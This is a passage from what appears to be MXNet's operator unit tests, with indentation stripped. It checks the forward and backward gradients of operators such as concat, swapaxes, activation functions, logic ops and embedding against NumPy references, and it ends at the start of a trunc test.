if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_log_sigmoid():
def flog_sigmoid(a):
return np.log(np.divide(1.0, np.add(1.0, np.exp(-a))))
def flog_sigmoid_grad(a):
return np.divide(1.0, np.add(1.0, np.exp(a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.log_sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = flog_sigmoid(xa)
ya_grad = flog_sigmoid_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_mish():
def fmish(a):
return a * np.tanh(np.log1p(np.exp(a)))
def fmish_grad(a):
softrelu = np.log1p(np.exp(a))
tanh = np.tanh(softrelu)
sigmoid = np.divide(1.0, (1.0 + np.exp(-a)))
return tanh + a * sigmoid * (1.0 - tanh * tanh)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.mish(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fmish(xa)
ya_grad = fmish_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
